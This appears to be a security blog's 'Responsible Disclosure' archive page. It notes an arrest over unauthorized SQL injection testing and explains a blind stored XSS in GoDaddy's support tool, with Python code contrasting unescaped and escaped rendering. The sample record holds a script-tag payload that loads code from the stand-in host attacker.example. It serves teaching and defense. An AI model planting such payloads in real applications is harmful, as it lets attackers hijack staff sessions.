
Category Archives: Responsible Disclosure

A security researcher in Florida was arrested after exposing SQL injection (SQLi) vulnerabilities in an election-related web application; apparently he had no authorization of any kind to test it.


OOPS!

“…the issue was that the GoDaddy customer support application pulled data from a shared database that my XSS payload was stored in and then reflected it insecurely into the page – causing this XSS vulnerability.”

https://thehackerblog.com/poisoning-the-well-compromising-godaddy-customer-support-with-blind-xss/

An InfoSec researcher, while registering his GoDaddy account, set his name to a Cross-Site Scripting payload as a joke.  Months later an issue required him to contact GoDaddy’s support line, and it soon became apparent that the “joke” was a stored (blind) XSS: the payload sat in a shared database and was rendered into the customer support application’s page without escaping, so a malicious actor could have used it to take control of any GoDaddy support representative’s session and do anything with their permissions.
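To make the mechanism concrete, here is an added example (not code from the linked post or from GoDaddy’s support application) of the pattern it describes: a customer-controlled field is stored in a shared database, and an internal support page later interpolates it into HTML. The customer record, the payload, and the `attacker.example` host are all constructed for illustration. The vulnerable renderer emits the stored payload as live markup; the hardened renderer escapes every untrusted value for its HTML context before interpolation, which is the fix the post implies.

```python
import html
import re

# Constructed sample: a customer record as it might sit in the shared database.
# The "name" field is a blind-XSS probe: it does nothing where it is entered
# and only fires wherever the stored value is later rendered unescaped.
CUSTOMER = {
    "id": 1001,
    "name": '"><script src="https://attacker.example/probe.js"></script>',
    "email": "customer@example.com",
}


def render_vulnerable(customer):
    """Interpolates raw database values straight into the support page.

    This is the bug class from the post: the data was trusted because it came
    from "our" database, but it originated from the customer's signup form.
    """
    name, email = customer["name"], customer["email"]
    return (
        f"<h1>Support ticket for {name}</h1>\n"
        f'<input type="text" value="{name}">\n'
        f"<p>Contact: {email}</p>"
    )


def render_safe(customer):
    """Escapes each untrusted value for the HTML body and attribute contexts.

    quote=True also encodes " and ', so the payload cannot break out of the
    value="..." attribute the name is placed into.
    """
    name = html.escape(str(customer["name"]), quote=True)
    email = html.escape(str(customer["email"]), quote=True)
    return (
        f"<h1>Support ticket for {name}</h1>\n"
        f'<input type="text" value="{name}">\n'
        f"<p>Contact: {email}</p>"
    )


# Heuristic check used below: does the rendered page contain an executable
# <script> tag?  Real templating audits would parse the HTML; a tag-open
# regex is enough to show the difference between the two renderers.
SCRIPT_RE = re.compile(r"<script\b", re.IGNORECASE)


def contains_live_script(rendered_html):
    """True if a literal <script ...> tag survived rendering."""
    return SCRIPT_RE.search(rendered_html) is not None


def demo():
    """Returns (vulnerable_has_script, safe_has_script) for the sample record."""
    return (
        contains_live_script(render_vulnerable(CUSTOMER)),
        contains_live_script(render_safe(CUSTOMER)),
    )


if __name__ == "__main__":
    print("--- vulnerable rendering ---")
    print(render_vulnerable(CUSTOMER))
    print("--- escaped rendering ---")
    print(render_safe(CUSTOMER))
    print("script tag present (vulnerable, safe):", demo())
```

Output encoding is the fix, but note what it does not do: if a payload ever does execute in the support representative’s browser, it runs with that representative’s session, so a `HttpOnly` cookie only stops cookie theft, not actions taken through the page itself. Escaping at the rendering site, in every application that reads the shared database, is what actually closes the hole.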

TL;DR: Read the page, it’s short and to-the-point